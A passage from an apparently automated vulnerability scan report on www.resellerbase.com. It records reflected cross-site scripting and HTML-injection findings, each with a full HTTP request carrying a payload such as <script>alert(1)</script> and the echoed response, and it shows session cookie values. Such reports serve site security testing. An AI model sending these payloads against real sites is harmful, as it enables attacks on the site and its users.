Date: Wed, 17 Nov 2010 23:04:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 19485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
5-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example/725a8"><a>6b697e5711f.com&ltr=%23">
...[SNIP]...

2.4948. http://www.resellerbase.com/user_search.php [name parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The value of the name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae006"><a>c850263ca11 was submitted in the name parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?pg_which=2&pflag=search&username=&email=&name=ae006"><a>c850263ca11&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:59:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?&pflag=search&username=&email=&name=ae006"><a>c850263ca11&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr=%23">
...[SNIP]...

2.4949. http://www.resellerbase.com/user_search.php [occupation parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The value of the occupation request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c098b"><a>bee91fbe589 was submitted in the occupation parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?occupation=555-555-0199@example.comc098b"><a>bee91fbe589&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:59:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 19458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?occupation=555-555-0199@example.comc098b"><a>bee91fbe589&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsers
...[SNIP]...

2.4950. http://www.resellerbase.com/user_search.php [submit parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af8b4"><a>c83a76ca756 was submitted in the submit parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?occupation=555-555-0199@example.com&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsersaf8b4"><a>c83a76ca756&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 19458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
&username=Peter%2bWiener&aol=555-555-0199@example.com&location=555-555-0199@example.com&email=wiener@example.com&interest=555-555-0199@example.com&name=Peter%2bWiener&pflag=search&submit=Search%2bUsersaf8b4"><a>c83a76ca756&icq=555-555-0199@example.com&homepage=30&yahoo=555-555-0199@example.com&ltr=%23">
...[SNIP]...

2.4951. http://www.resellerbase.com/user_search.php [username parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab674"><a>468a269669e was submitted in the username parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?pg_which=2&pflag=search&username=ab674"><a>468a269669e&email=&name=&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:59:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?&pflag=search&username=ab674"><a>468a269669e&email=&name=&homepage=&icq=&yahoo=&aol=&biography=&interest=&location=&occupation=&ltr=%23">
...[SNIP]...

2.4952. http://www.resellerbase.com/user_search.php [yahoo parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/user_search.php

Issue detail

The value of the yahoo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4ec8"><a>9ecf5e06819 was submitted in the yahoo parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_search.php?pg_which=3&pflag=search&username=&email=&name=&homepage=&icq=&yahoo=a4ec8"><a>9ecf5e06819&aol=&biography=&interest=&location=&occupation=&ltr= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 14004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Result</title
...[SNIP]...
<a href="/user_search.php?&pflag=search&username=&email=&name=&homepage=&icq=&yahoo=a4ec8"><a>9ecf5e06819&aol=&biography=&interest=&location=&occupation=&ltr=%23">
...[SNIP]...

2.4953. http://www.resellerbase.com/web-service/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8edca<script>alert(1)</script>ff5895c7b43d980cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service8edca<script>alert(1)</script>ff5895c7b43d980cf/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service8edca<script>alert(1)</script>ff5895c7b43d980cf/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4954. http://www.resellerbase.com/web-service/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 444e5<script>alert(1)</script>6746596f832 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service444e5<script>alert(1)</script>6746596f832/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service444e5<script>alert(1)</script>6746596f832/ was not found on this server.</p>
...[SNIP]...

2.4955. http://www.resellerbase.com/web-service/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7e7b4<script>alert(1)</script>e2da2ea57f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/?7e7b4<script>alert(1)</script>e2da2ea57f1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/?7e7b4<script>alert(1)</script>e2da2ea57f1=1 was not found on this server.</p>
...[SNIP]...

2.4956. http://www.resellerbase.com/web-service/ [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload d14de<a>81118b9405d was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fd14de<a>81118b9405d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fd14de<a>81118b9405d was not found on this server.</p>
...[SNIP]...

2.4957. http://www.resellerbase.com/web-service/domain-names/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5c541<script>alert(1)</script>70426b600e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service5c541<script>alert(1)</script>70426b600e/domain-names/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service5c541<script>alert(1)</script>70426b600e/domain-names/ was not found on this server.</p>
...[SNIP]...

2.4958. http://www.resellerbase.com/web-service/domain-names/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ab0d8<script>alert(1)</script>d74af83afc8105d92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-serviceab0d8<script>alert(1)</script>d74af83afc8105d92/domain-names/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceab0d8<script>alert(1)</script>d74af83afc8105d92/domain-names/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4959. http://www.resellerbase.com/web-service/domain-names/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7947c<script>alert(1)</script>05c5c3e4ee2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names7947c<script>alert(1)</script>05c5c3e4ee2/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names7947c<script>alert(1)</script>05c5c3e4ee2/ was not found on this server.</p>
...[SNIP]...

2.4960. http://www.resellerbase.com/web-service/domain-names/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 54146<script>alert(1)</script>c2e3b5c5c5b400379 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/domain-names54146<script>alert(1)</script>c2e3b5c5c5b400379/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names54146<script>alert(1)</script>c2e3b5c5c5b400379/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4961. http://www.resellerbase.com/web-service/domain-names/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7ac69<script>alert(1)</script>2bfa65558b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/?7ac69<script>alert(1)</script>2bfa65558b9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/?7ac69<script>alert(1)</script>2bfa65558b9=1 was not found on this server.</p>
...[SNIP]...

2.4962. http://www.resellerbase.com/web-service/domain-names/ [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 3f88f<a>e03be7ccc32 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f3f88f<a>e03be7ccc32 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f3f88f<a>e03be7ccc32 was not found on this server.</p>
...[SNIP]...

2.4963. http://www.resellerbase.com/web-service/domain-names/googlepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a98fc<script>alert(1)</script>8bbebc14c8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicea98fc<script>alert(1)</script>8bbebc14c8e/domain-names/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicea98fc<script>alert(1)</script>8bbebc14c8e/domain-names/googlepr.php was not found on this server.</p>
...[SNIP]...

2.4964. http://www.resellerbase.com/web-service/domain-names/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70bc1<script>alert(1)</script>2d2eedb6197 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names70bc1<script>alert(1)</script>2d2eedb6197/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names70bc1<script>alert(1)</script>2d2eedb6197/googlepr.php was not found on this server.</p>
...[SNIP]...

2.4965. http://www.resellerbase.com/web-service/domain-names/googlepr.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 105e7<script>alert(1)</script>91992e35add was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/googlepr.php105e7<script>alert(1)</script>91992e35add HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
